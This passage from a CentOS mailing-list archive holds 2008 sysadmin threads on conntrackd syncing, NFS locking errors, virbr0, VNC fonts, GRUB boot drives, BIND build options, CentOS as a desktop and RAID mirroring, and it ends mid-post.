Re: [CentOS] conntrack-tools and Session syncing

[Nataraj]

On Sun, 2008-08-10 at 20:28 +0200, Dirk H. Schulz wrote:
> Hi Robert,
> 
> --On 10. August 2008 13:56:22 -0400 Robert Spangler 
> <[EMAIL PROTECTED]> wrote:
> 
> - snip -
> 
> > OK, I don't know this tool you are using to syn the conntracking of all
> > the  firewalls.  Could you post a link to it?
> 
> Yes, of course: 
> 
> 
> >
> > Now for the fun stuff.  Why would you have many Internet connection that
> > do  not return the same path they go out on?  sounds like you really only
> > have  one true connection with one true IP to the Internet.  That would
> > explain why  traffic leaving on interface 2 comes back on interface 1.
> 
> It is two routers that are connected to 2 upstream routers; all four use 
> OSPFv2 for routing between them.
> I have not finetuned OSPF so far to avoid asynchronous routing - I want to 
> to do the connection table synchronization stuff before because I have to 
> do it anyway (in case of a router crash) and now I have an ideal testbed 
> (because of the asynchronous routing).
> 
> >
> > Without knowing your setup I'm not going to guess at this.
> 
> The setup is as follows: Every Router has
> - an external interface with public ip address each resting in a small 
> separate subnet that connects to the upstream router
> - an interface for inter router connections (private ip addresses)
> - 2 additional interfaces to server LANs - both routers have an interface 
> to both of the 2 server LANs
>   both server LAN interface use shared virtual ips additionally
> 
> If you need more detailed information I could offer the OSFP configuration 
> (XORP).
> 
> Here is the configuration for conntrackd (I have omitted buffer sizes 
> etc.):
> > Sync {
> > Mode FTFW {
> > ResendBufferSize 262144
> > CommitTimeout 180
> > ACKWindowSize 20
> > }
> > Multicast {
> > IPv4_address 225.0.0.50
> > IPv4_interface 192.168.11.1
> > Interface eth1
> > Group 3780
> > }
> > Checksum on
> > CacheWriteThrough On
> > }
> > General {
> > HashSize 8192
> > HashLimit 65535
> - snip -
> > IgnoreTrafficFor {
> > IPv4_address INTER_ROUTER_INTERFACE
> > IPv4_address EXTERNAL_INTERFACE
> > IPv4_address INTERNAL_INTERFACE1
> > IPv4_address INTERNAL_VIRTUAL_IP
> > IPv4_address INTERNAL_INTERFACE2
> > }
> >
> > IgnoreProtocol {
> > IGMP
> > VRRP
> > }
> 
> The setup works - using "conntrackd -e" I can see the connection table 
> entries the other router's conntrackd has synchronized. What I cannot check 
> is if the receiving conntrackd writes the received entries into the kernels 
> connection tracking table.

yum install iptstate
iptstate
Also: cat /proc/net/nf_conntrack


The doc says you must have kernel 2.6.18 or later. It looks like there
are some iptables features that you can use that will not allow this to
work. Are you in compliance with all of the dependencies listed in
http://conntrack-tools.netfilter.org/conntrackd.html ?

Nataraj


> Example:
> > udp  17 30 src=124.165.230.206 dst=93.94.81.82 sport=2040 dport=1434 
> [UNREPLIED] [active since 6s]
> > tcp  6 120 SYN_SENT src=93.185.115.91 dst=93.94.80.133 sport=4290 
> dport=135 [UNREPLIED] [active since 46s]
> 
> So I hope to find someone on the list have done this kind of setup before.


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Kerio Mailserver on Centos 5

[Dirk H. Schulz]

Hi Dk,

we will be testing that from the end of september onwards, but until now we 
have only run it on MacOS X.


--On 12. August 2008 15:54:06 -0700 dnk <[EMAIL PROTECTED]> wrote:


I was wondering if any of the mail admins on here have used the kerio
mail server on centos, and their thoughts on it.


My initial testing is going very well - but was hoping for some unbiased
opinions (as opposed to asking on the kerio forum) on it's use with
centos (5 in particular if possible). THE typical q's - IE performance,
issues, etc.


I would be interested in that, too.

Dirk

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] What is vibr0 Network interface and what is it used for

[Lunix1618]

Hello,

I have see that my machine have an interface that named virbr0. I have 
no idea what is it and what it using for ? I am not configured any IP 
address for it but I see it had an IP address and see it listed in 
firewall config.
Can anyone give me an explanation about this or point me to a document 
that describe it ?


My machine running CentOS 5.2 and do not have internet connection from 
the installation time.


Thanks,


virbr0Link encap:Ethernet  HWaddr 00:00:00:00:00:00 
 inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0

 inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0
 RX bytes:0 (0.0 b)  TX bytes:9143 (8.9 KiB)

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] NFS issues

[Johan Swensson]

No firewall on either end and server responds to ping.

client:
  program vers proto   port
   102   tcp111  portmapper
   102   udp111  portmapper
   1000241   udp889  status
   1000241   tcp892  status
server:

  program vers proto   port
   102   tcp111  portmapper
   102   udp111  portmapper
   1000241   udp964  status
   1000241   tcp967  status
   1000111   udp718  rquotad
   1000112   udp718  rquotad
   1000111   tcp721  rquotad
   1000112   tcp721  rquotad
   132   udp   2049  nfs
   133   udp   2049  nfs
   134   udp   2049  nfs
   1000211   udp  32768  nlockmgr
   1000213   udp  32768  nlockmgr
   1000214   udp  32768  nlockmgr
   132   tcp   2049  nfs
   133   tcp   2049  nfs
   134   tcp   2049  nfs
   1000211   tcp  58027  nlockmgr
   1000213   tcp  58027  nlockmgr
   1000214   tcp  58027  nlockmgr
   151   udp778  mountd
   151   tcp781  mountd
   152   udp778  mountd
   152   tcp781  mountd
   153   udp778  mountd
   153   tcp781  mountd

However I just rebooted the nfs server. But when I checked before lockd 
was running with a ps -A
As Craig said he started notice this about the the time he upgraded to 
5.2, the same goes for me, started getting this problem about the time 
I've upgraded the clients and server.

nate wrote:

Johan Swensson wrote:
  

It happend again this night but now I temporarily(?) fixed it with
mounting -o nolock on the web servers.
It works but dmesg is still spamming "lockd: server 192.168.20.22 not
responding, timed out". Atleast my sites are up, and the message isn't
critical anymore.
But how can I get rid of it?



What does 'rpcinfo -p' read on both the servers and the clients?

Also how about /etc/init.d/nfs status (both client and server)
and /etc/init.d/nfslock status (both client and server)

Any firewalls in between client and server?
Run: iptables -L -n (on both client and server)

nate

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
  



--

*Johan Swensson | apegroup*
System Administrator
[EMAIL PROTECTED]
Mobile: +46 (0) 735 21 98 58
www.apegroup.com
Fiskartorpsvägen 52, 115 42 Stockholm
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] NFS issues

[Craig White]

On Tue, 2008-08-12 at 20:16 -0700, nate wrote:
> Johan Swensson wrote:
> > It happend again this night but now I temporarily(?) fixed it with
> > mounting -o nolock on the web servers.
> > It works but dmesg is still spamming "lockd: server 192.168.20.22 not
> > responding, timed out". Atleast my sites are up, and the message isn't
> > critical anymore.
> > But how can I get rid of it?
> 
> What does 'rpcinfo -p' read on both the servers and the clients?
> 
> Also how about /etc/init.d/nfs status (both client and server)
> and /etc/init.d/nfslock status (both client and server)
> 
> Any firewalls in between client and server?
> Run: iptables -L -n (on both client and server)

I don't want to step on Johan's thread but wanted to commiserate with
him.

No firewall's at present...
nfs and nfslock on both client and server are running and show pid's

client
[EMAIL PROTECTED] ~]# rpcinfo -p   
   program vers proto   port  service   
104   tcp111  portmapper
103   tcp111  portmapper
102   tcp111  portmapper
104   udp111  portmapper
103   udp111  portmapper
102   udp111  portmapper
104 0111  portmapper
103 0111  portmapper
102 0111  portmapper
1000241   udp  50259  status
1000241   tcp  53710  status
1000211   tcp  53045  nlockmgr  
1000213   tcp  53045  nlockmgr  
1000214   tcp  53045  nlockmgr  

server
[EMAIL PROTECTED] log]# rpcinfo -p
   program vers proto   port
102   tcp111  portmapper
102   udp111  portmapper
1000241   udp   4003  status
1000241   tcp   4003  status
1000111   udp   4000  rquotad
1000112   udp   4000  rquotad
1000111   tcp   4000  rquotad
1000112   tcp   4000  rquotad
132   udp   2049  nfs
133   udp   2049  nfs
134   udp   2049  nfs
1000211   udp   4001  nlockmgr
1000213   udp   4001  nlockmgr
1000214   udp   4001  nlockmgr
1000211   tcp   4001  nlockmgr
1000213   tcp   4001  nlockmgr
1000214   tcp   4001  nlockmgr
132   tcp   2049  nfs
133   tcp   2049  nfs
134   tcp   2049  nfs
151   udp   4002  mountd
151   tcp   4002  mountd
152   udp   4002  mountd
152   tcp   4002  mountd
153   udp   4002  mountd
153   tcp   4002  mountd

Server has ports fixed in place with settings in /etc/sysconfig/nfs

Craig

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] NFS issues

[nate]

Johan Swensson wrote:
> It happend again this night but now I temporarily(?) fixed it with
> mounting -o nolock on the web servers.
> It works but dmesg is still spamming "lockd: server 192.168.20.22 not
> responding, timed out". Atleast my sites are up, and the message isn't
> critical anymore.
> But how can I get rid of it?

What does 'rpcinfo -p' read on both the servers and the clients?

Also how about /etc/init.d/nfs status (both client and server)
and /etc/init.d/nfslock status (both client and server)

Any firewalls in between client and server?
Run: iptables -L -n (on both client and server)

nate

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[nate]

Fajar Priyanto wrote:

> In current days of distro like Ubuntu, Opensuse, and Mandriva, being
> "suitable" is not enough anymore (I think). Try install Centos on a
> notebook, and we will see that the wifi is not recognized. Sure as
> sysadmin we can do ndiswrapper, etc. But what will "ordinary" /
> first-timer say?

I don't know if this says anything, but as a linux user/admin for
more than a decade now, I still couldn't figure out how to get
wifi working in Ubuntu without that little network UI applet in
gnome. And yes I did try on several occasions, found some reference
documentation online, but none of it seemed to work. (GNOME is
not my desktop of choice so I wanted to figure this out, I ended
up just firing up a local VNC so I could login to gnome from
my desktop(afterstep) to control wifi when I needed it).

And that's with the OS fully detecting and supporting the underlying
hardware, and with a user who has absolutely no fear of the command
line. I'm sure I would of figured it out eventually it just wasn't
*that* important since I had a workaround.

nate

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[nate]

MHR wrote:

> To repeat what has been said before (right here!): CentOS is just like
> RHEL, an enterprise Linux distribution, suitable for anything from
> laptops to desktops to enterprise-wide networked multi-server
> machines.

I don't think RHEL would make a good desktop. I think it would make
an ok workstation, or perhaps corporate desktop, where things are
tightly controlled. There's just not enough things available for
it in the default distribution, and hardware support isn't quite
kept up to date. If your standardizing on some platform that
supports RHEL (or perhaps just works with RHEL) then great.
When I say workstation I mean a replacement for something like
an IRIX, Solaris, or HP-UX box that would run specialized software
(3D modeling or something).

http://www.press.redhat.com/2008/04/16/whats-going-on-with-red-hat-desktop-systems-an-update

"It’s worth pointing out what’s missing in the list above: we
have no plans to create a traditional desktop product for the
consumer market in the foreseeable future."

Of course everyone's ideas are different, these are just mine.

If your adding stuff from all sorts of 3rd party repositories
to get your system to your liking, well at least to me it's
not really RHEL(or CentOS) anymore (depending on how much you
add), it's just based on RHEL (or CentOS). I see a seemingly
endless supply of posts of people complaining about how
3rd party repositories have screwed up their systems(most
often it's because they haven't configured everything right,
but apparently it's not very obvious). If/when RHEL decides to
vastly increase the amount of software that they provide/support
in their distribution I think it may become a worthwhile system
to use on the desktop.

Until then, for me at least, it's Debian on my desktops(when
the hardware is supported), or otherwise Ubuntu LTS (I do
enable the universe repositories which aren't officially
supported but at least seem to seamlessly integrate into
the system without issue -- though I haven't used Ubuntu in
several months, maybe things have changed).

Debian stable has roughly 18,000 packages.

CentOS 5 seems to have roughly 2400 packages by comparison,
fortunately in a server role it(and CentOS 4) provide almost
everything I need(I do install about 50 extra packages), though
a desktop system needs quite a bit more. The desktop/server
I'm writing this on (Debian stable) has 1400 packages installed,
my servers get about 850.

I used to think SuSE was pretty slick but haven't looked at it
since I started messing with Ubuntu a couple years ago.

Main reasons I like RHEL/CentOS:
- kickstart rocks, Debian doesn't really have anything that compares
  (IMO)
- I've come to like src RPMS, they really make building from
  source easy
- long release cycles (which can be bad for laptops/desktops
  especially from a hardware support perspective, even Ubuntu
  had trouble with suspend/resume on my last laptop - Toshiba M5,
  Ubuntu 7.04 worked quite reliably, but when I upgraded to 8,
  it pretty much stopped working for no apparent reason(even
  using the older kernel didn't help).

There's certainly potential for a good desktop in RHEL, the
software just isn't there yet(I'd be willing to forgive the
hardware support, just give me more packages to choose from
and provide security updates etc for).

nate

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[MHR]

On Tue, Aug 12, 2008 at 7:51 PM, Fajar Priyanto <[EMAIL PROTECTED]> wrote:
>
> In current days of distro like Ubuntu, Opensuse, and Mandriva, being
> "suitable" is not enough anymore (I think). Try install Centos on a
> notebook, and we will see that the wifi is not recognized. Sure as
> sysadmin we can do ndiswrapper, etc. But what will "ordinary" /
> first-timer say?
>

You're comparing apples to oranges here.  I didn't say it was the best
/distro/ for a laptop (or notebook), I just said I use it there.  And,
yes, wireless was a pain, but that's life in Linux without all the
fancy Windows trappings

> My personal view is:
> As server: Yes, yes, yes
> As desktop: Simply no (comparing to other distros).

As you said, this is a personal view.

mhr
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] NFS issues

[Craig White]

On Tue, 2008-08-12 at 14:27 +0200, Johan Swensson wrote:
> So I'm running nfs to get content to my web servers. Now I've had this
> problem 2 times (about 2 weeks since the last occurrence).
> I use drbd on the nfs server for redundancy. Now to my problem:
> 
> All my web sites stopped responding so I started by checking dmesg and
> there I found a bunch of this errors
> Aug 11 16:00:39 web03 kernel: lockd: server 192.168.20.22 not responding, 
> timed out
> Aug 11 16:02:39 web03 kernel: lockd: server 192.168.20.22 not responding, 
> timed out
> 
> But when checking the nfs server lockd was running and I could access
> all the files from the webserver with ls, cd etc.
> 
> The logs on the nfs server doesn't say anything of interest and
> checking apaches error_log just says "not found or unable to stat".
> 
> Now I mentioned this have happened 2 times and both these times I've
> "solved" it by rebooting the nfs server and web servers. This isn't a
> good solution to have to reboot my servers every couple of weeks so I
> really could use some help. :)
> 
> Also I get this from time to time on the web servers, dunno if it's
> related.
> do_vfs_lock: VFS is out of sync with lock manager!

I too have been having the same issues with my nfs server - which seems
to have started when I updated on July 27th (5.2)

It seems to happen after logrotate on Sunday morning but I didn't know
about it until users show up on Monday mornings.

/var/log/messages has...

Aug  4 09:32:59 cube kernel: lockd: server HOSTNAME not responding,
still trying

and like you, I've rebooted the main server each time (Monday
mornings)...there's something wrong that I can't figure out

Craig

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Fajar Priyanto]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MHR wrote:
> Hmm.  I use CentOS as my desktop OS, my laptop OS, my workdesk OS and
> my work is also converting over (sometime RSN) to use CentOS as the
> base OS for our application.
> 
> To repeat what has been said before (right here!): CentOS is just like
> RHEL, an enterprise Linux distribution, suitable for anything from
> laptops to desktops to enterprise-wide networked multi-server
> machines.

In current days of distro like Ubuntu, Opensuse, and Mandriva, being
"suitable" is not enough anymore (I think). Try install Centos on a
notebook, and we will see that the wifi is not recognized. Sure as
sysadmin we can do ndiswrapper, etc. But what will "ordinary" /
first-timer say?

My personal view is:
As server: Yes, yes, yes
As desktop: Simply no (comparing to other distros).
- --
Fajar Priyanto | Reg'd Linux User #327841 | Linux tutorial
http://linux2.arinet.org
13:10:54 up 5:02, 2.6.24-18-generic GNU/Linux
Let's use OpenOffice. http://www.openoffice.org
The real challenge of teaching is getting your students motivated to learn.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIokul8TneBL/L6RoRAj4DAJ9OqeDQdiLMkFNtFkCX0SaCbv+4MgCfTcVy
c5YYcdntBn2LFQDcCZZE01k=
=4W54
-END PGP SIGNATURE-
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Missing fonts for tightvnc

[Robert Moskowitz]

Filipe Brandenburger wrote:

On Tue, Aug 12, 2008 at 14:53, Robert Moskowitz <[EMAIL PROTECTED]> wrote:
  

Font directory '/usr/X11R6/lib/X11/fonts/misc' not found - ignoring (then
the same message for Speedo, Type1, 75dpi, and 100dpi).
Then a fatel server error about: could not open default fount 'fixed'



>From the path, I'm assuming you are using CentOS 4, since on CentOS 5
the fonts are located under /usr/share/X11/fonts instead.
  

No. This is Centos 5! So perhaps there is an issue with tightVNC

On an installation of CentOS 4 I have, all the files under that
directory belong to the "fonts-xorg-base" package, so you might try
starting with that one. Looking at fonts.alias inside misc, I believe
the name "fixed" is going to be aliased to a font in that directory,
so this should fix your problem.

If that still does not fix your problem, then try installing
"fonts-xorg-100dpi" and "fonts-xorg-75dpi" as well.
For Centos 5, there are a number of fonts-xorg-100dpi, a '14' a '15' and 
I don't recall what else I found with the help of yumex.



___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] NFS issues

[Johan Swensson]

It happend again this night but now I temporarily(?) fixed it with 
mounting -o nolock on the web servers.
It works but dmesg is still spamming "lockd: server 192.168.20.22 not 
responding, timed out". Atleast my sites are up, and the message isn't 
critical anymore.

But how can I get rid of it?

Johan Swensson wrote:
So I'm running nfs to get content to my web servers. Now I've had this 
problem 2 times (about 2 weeks since the last occurrence).

I use drbd on the nfs server for redundancy. Now to my problem:

All my web sites stopped responding so I started by checking dmesg and 
there I found a bunch of this errors

||
Aug 11 16:00:39 web03 kernel: lockd: server 192.168.20.22 not responding, timed 
out
Aug 11 16:02:39 web03 kernel: lockd: server 192.168.20.22 not responding, timed 
out

But when checking the nfs server lockd was running and I could access 
all the files from the webserver with ls, cd etc.


The logs on the nfs server doesn't say anything of interest and 
checking apaches error_log just says "not found or unable to stat".


Now I mentioned this have happened 2 times and both these times I've 
"solved" it by rebooting the nfs server and web servers. This isn't a 
good solution to have to reboot my servers every couple of weeks so I 
really could use some help. :)


Also I get this from time to time on the web servers, dunno if it's 
related.

/do_vfs_lock: VFS is out of sync with lock manager! /


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
  


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail is not putting the full information in the received header anymore

[Filipe Brandenburger]

Hi,

On Tue, Aug 12, 2008 at 09:38, Jason Pyeron <[EMAIL PROTECTED]> wrote:
> Previously, when our server received an email it would slap the rcpt to in the
> received headers by adding a for <...> any ideas what has changed?

In my (vast) experience with e-mail (most of it with Postfix though) I
observed this behaviour when the message was for multiple recipients.
IIRC, Postfix adds a "for <...>" only if the message is for one
recipient only. Probably sendmail will do the same, as the problem is
inherent to SMTP mail handling (where one message may be directed to
multiple recipients). I remember the first time I noticed that I was
puzzled by it as well.

HTH,
Filipe
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Missing fonts for tightvnc

[Filipe Brandenburger]

On Tue, Aug 12, 2008 at 14:53, Robert Moskowitz <[EMAIL PROTECTED]> wrote:
> Font directory '/usr/X11R6/lib/X11/fonts/misc' not found - ignoring (then
> the same message for Speedo, Type1, 75dpi, and 100dpi).
> Then a fatel server error about: could not open default fount 'fixed'

>From the path, I'm assuming you are using CentOS 4, since on CentOS 5
the fonts are located under /usr/share/X11/fonts instead.

On an installation of CentOS 4 I have, all the files under that
directory belong to the "fonts-xorg-base" package, so you might try
starting with that one. Looking at fonts.alias inside misc, I believe
the name "fixed" is going to be aliased to a font in that directory,
so this should fix your problem.

If that still does not fix your problem, then try installing
"fonts-xorg-100dpi" and "fonts-xorg-75dpi" as well.

HTH,
Filipe
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Changing boot drives

[Filipe Brandenburger]

On Tue, Aug 12, 2008 at 21:22, MHR <[EMAIL PROTECTED]> wrote:
> So, what is the best way to put a correct MBR that will boot from
> /dev/sda on /dev/sda if /dev/sda is the first boot device?

Assuming you use grub to boot:

# grub-install /dev/sda

HTH,
Filipe
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[MHR]

On Tue, Aug 12, 2008 at 6:21 PM, Fajar Priyanto <[EMAIL PROTECTED]> wrote:
>
> I think Ubuntu is targeted for desktop use and less savvy users. That's
> why they need something like Wubi for easiness. And since Centos is not
> a desktop distro (cmiiw), the users tend to be somekind of sysadmin
> which (subjectively) prefer something like vmware-server to do Centos in
> Windows. (Beside, Wubi is broken in Vista)

Hmm.  I use CentOS as my desktop OS, my laptop OS, my workdesk OS and
my work is also converting over (sometime RSN) to use CentOS as the
base OS for our application.

To repeat what has been said before (right here!): CentOS is just like
RHEL, an enterprise Linux distribution, suitable for anything from
laptops to desktops to enterprise-wide networked multi-server
machines.

I use vmware server to run Windows on CentOS.  (I will withhold my
personal opinion of using vmware-server to run anything on Windows, or
even just run /anything/ on Windows at all, other than that which does
not run anywhere else.)

mhr
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Changing boot drives

[MHR]

This is probably a dumb question, but I haven't found anything that
clearly describes what I need.

My system has 2 IDE (PATA) hard drives and 2 SATA hard drives.
/dev/hda is the boot drive, but /dev/sda contains my CentOS
installation, including /boot, /, /home and swap.  I know for a fact
that there is no MBR on /dev/sda because the system refuses to boot
from it.  I would like to rearrange the boot order to use /dev/sda as
the boot device (mainly because I'm probably going to get either
another disk drive or both another disk drive and a m/b soon that does
not have two IDE connectors (I have two IDE DVD burners) and I'd
rather not replace any more than absolutely necessary to accomplish
this.

So, what is the best way to put a correct MBR that will boot from
/dev/sda on /dev/sda if /dev/sda is the first boot device?

Thanks.

mhr
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Fajar Priyanto]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Karanbir Singh wrote:
> Ned Slider wrote:
>> I agree - I think that whilst features like this may be appealing to
>> the goals of Ubuntu, they do not necessarily match the goals of the
>> CentOS project.
> 
> How'd you work that out ?

I think Ubuntu is targeted for desktop use and less savvy users. That's
why they need something like Wubi for easiness. And since Centos is not
a desktop distro (cmiiw), the users tend to be somekind of sysadmin
which (subjectively) prefer something like vmware-server to do Centos in
Windows. (Beside, Wubi is broken in Vista)
- --
Fajar Priyanto | Reg'd Linux User #327841 | Linux tutorial
http://linux2.arinet.org
13:10:54 up 5:02, 2.6.24-18-generic GNU/Linux
Let's use OpenOffice. http://www.openoffice.org
The real challenge of teaching is getting your students motivated to learn.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIojcn8TneBL/L6RoRAqDPAJ92yv7S0QEQVnpXwU5fbcK3Jta2NgCfYTna
FLZ9hiNNGwON9/i59TT2XEM=
=Hn5Q
-END PGP SIGNATURE-
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] bind-9.3.4-6.0.2.P1.el5_2 and rrset-order: order 'fixed'not fully implemented

[Keith Christian]

--- On Tue, 8/12/08, Johnny Hughes <[EMAIL PROTECTED]> wrote:

> From: Johnny Hughes <[EMAIL PROTECTED]>
> Subject: Re: [CentOS] bind-9.3.4-6.0.2.P1.el5_2 and rrset-order: order 
> 'fixed'not fully implemented
> To: "CentOS mailing list" 
> Date: Tuesday, August 12, 2008, 5:34 PM
> Scott McClanahan wrote:
> >> According to this page, BIND can be compiled with
> the "enabled-fixed-rrset" option to support this. 
> How to determine what switches were used to compile the BIND
> RPM I downloaded with "yum update?"
> > 
> > I was recently curious about this too.  Is there an
> easier way than
> > peering into the spec file?  Thanks
> > 
> 
> No, that is the only way I know.
> 
> The build log when we made it said:
> 
> ./configure --build=i686-redhat-linux-gnu
> --host=i686-redhat-linux-gnu 
> --target=i386-redhat-linux-gnu --program-prefix=
> --prefix=/usr 
> --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin 
> --sysconfdir=/etc --datadir=/usr/share
> --includedir=/usr/include 
> --libdir=/usr/lib --libexecdir=/usr/libexec
> --localstatedir=/var 
> --sharedstatedir=/usr/com --mandir=/usr/share/man 
> --infodir=/usr/share/info --with-libtool
> --localstatedir=/var 
> --enable-threads --enable-ipv6 --with-pic
> --with-openssl=/usr 
> --enable-libbind 'CFLAGS=-O2 -g -pipe -Wall
> -Wp,-D_FORTIFY_SOURCE=2 
> -fexceptions -fstack-protector --param=ssp-buffer-size=4
> -m32 
> -march=i386 -mtune=generic -fasynchronous-unwind-tables 
> -I/usr/kerberos/include
> 
> This is also in the log for "/lib/bind":
> 
> running /bin/sh './configure' --prefix=/usr 
> '--build=i686-redhat-linux-gnu'
> '--host=i686-redhat-linux-gnu' 
> '--target=i386-redhat-linux-gnu'
> '--program-prefix=' '--prefix=/usr' 
> '--exec-prefix=/usr' '--bindir=/usr/bin'
> '--sbindir=/usr/sbin' 
> '--sysconfdir=/etc' '--datadir=/usr/share'
> '--includedir=/usr/include' 
> '--libdir=/usr/lib'
> '--libexecdir=/usr/libexec' 
> '--sharedstatedir=/usr/com'
> '--mandir=/usr/share/man' 
> '--infodir=/usr/share/info'
> '--with-libtool' '--localstatedir=/var' 
> '--enable-threads' '--enable-ipv6'
> '--with-pic' '--with-openssl=/usr' 
> '--enable-libbind' 'CFLAGS=-O2 -g -pipe -Wall
> -Wp,-D_FORTIFY_SOURCE=2 
> -fexceptions -fstack-protector --param=ssp-buffer-size=4
> -m32 
> -march=i386 -mtune=generic -fasynchronous-unwind-tables 
> -I/usr/kerberos/include ' 'CPPFLAGS=
> -I/usr/kerberos/include ' 
> 'CXXFLAGS=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2
> -fexceptions 
> -fstack-protector --param=ssp-buffer-size=4 -m32
> -march=i386 
> -mtune=generic -fasynchronous-unwind-tables'
> 'FFLAGS=-O2 -g -pipe -Wall 
> -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector 
> --param=ssp-buffer-size=4 -m32 -march=i386 -mtune=generic 
> -fasynchronous-unwind-tables' 'LDFLAGS=
> -L/usr/kerberos/lib ' 
> 'build_alias=i686-redhat-linux-gnu'
> 'host_alias=i686-redhat-linux-gnu' 
> 'target_alias=i386-redhat-linux-gnu'
> --cache-file=/dev/null --srcdir=.
> 
> But remember, we do not pick these switches, we build them
> like they are 
> in RHEL.



Thanks for the info, Johnny --- I extracted the .src.rpm and edited the 
SPECS/bind.spec file, adding the --enable-fixed-rrset option to the list of 
options to "configure."  After that, I ran rpmbuild, and saw 
"--enable-fixed-rrset" in my terminal's scrollback buffer.

Unfortunately that did not fix the problem.  Do you have any other suggestions 
about other places in the SPECS/bind.spec file to put that option?

Interested in producing a compiled RPM with that option.

Thanks,

===Keith


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Suggestion on Network Management software with troubleticket system

[Fajar Priyanto]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nifty Cluster Mitch wrote:
> I suspect you need tracking, ownership, states (new, assigned, working, OMGH, 
> fixed), attached documents, the ability to generate 
> reports and also solve the do you remember games when systems are down 
> (documentation).
> 
> Network management is interesting If there is a problem with the
> network, bug systems and other "tools" may also be off line.The classic
> way to monitor a network is to live on it and have a phone, Rolodex and pager
> handy to contact the other end of the wire.

Hello guys,
Thank you so much for the suggestions. All looks interesting and I've
downloaded them. It will be an exciting try-out.

After some thoughts, I hope I might be able to find one which answers these:
1. The status of servers (traffic, services, availability)
2. Network inventory (ip, users, host, host's specs)
3. Support ticket (connected to host and user) with history view, so we
can see the trend.
4. Knowledge base / documentation management

- --
Fajar Priyanto | Reg'd Linux User #327841 | Linux tutorial
http://linux2.arinet.org
13:10:54 up 5:02, 2.6.24-18-generic GNU/Linux
Let's use OpenOffice. http://www.openoffice.org
The real challenge of teaching is getting your students motivated to learn.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIojPP8TneBL/L6RoRAnDVAJ9/5hJem88OOxigElbbzO13FYWMcgCdHts6
aYBU8yV90tWqU4ENZkbStA8=
=oP0/
-END PGP SIGNATURE-
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Mirroring Hard Drive

[Paul R. Ganci]

Robert wrote:
I should have had the common decency to report that I *did* try this 
howto and *was* successful. There were a couple things that caused 
some head-scratching.
Yes I also made it work this weekend. I ignored all the stuff regarding 
the creation of /etc/mtab and mdadm.conf ... they are not needed.


I also took the precaution of entering single user mode (init 1) before 
copying the file system, etc. The rationale for doing this first is so 
that the system is not writing anything while or after you do the copy. 
I read this from this URL


http://www.linuxconfig.org/Linux_Software_Raid_1_Setup

which describes the same basic procedure.

Also I am not sure that all the grub installs are necessary. I thought 
that once grub was installed it was unnecessary to re-install. It is 
only necessary to change the /boot/grub/grub.conf and the changes take 
effect. Similarly with the ramdisk. I am not sure it is necessary to 
keep running mkinitrd to create a new ramdisk just because the grub.conf 
changed. Can somebody who might know for sure comment? I admit I 
followed the instructions regarding the running of grub/mkinitrd to the 
letter only because I was chicken to do elsewise.


Ironically I discovered that the new raid drive (i.e. /dev/sdb from the 
documentation) was defective. When trying to sync with /dev/sda after I 
added it to the array the sync hit some bad blocks on the /dev/sdb and 
so the sync failed. The system went into an infinite loop of sorts (fail 
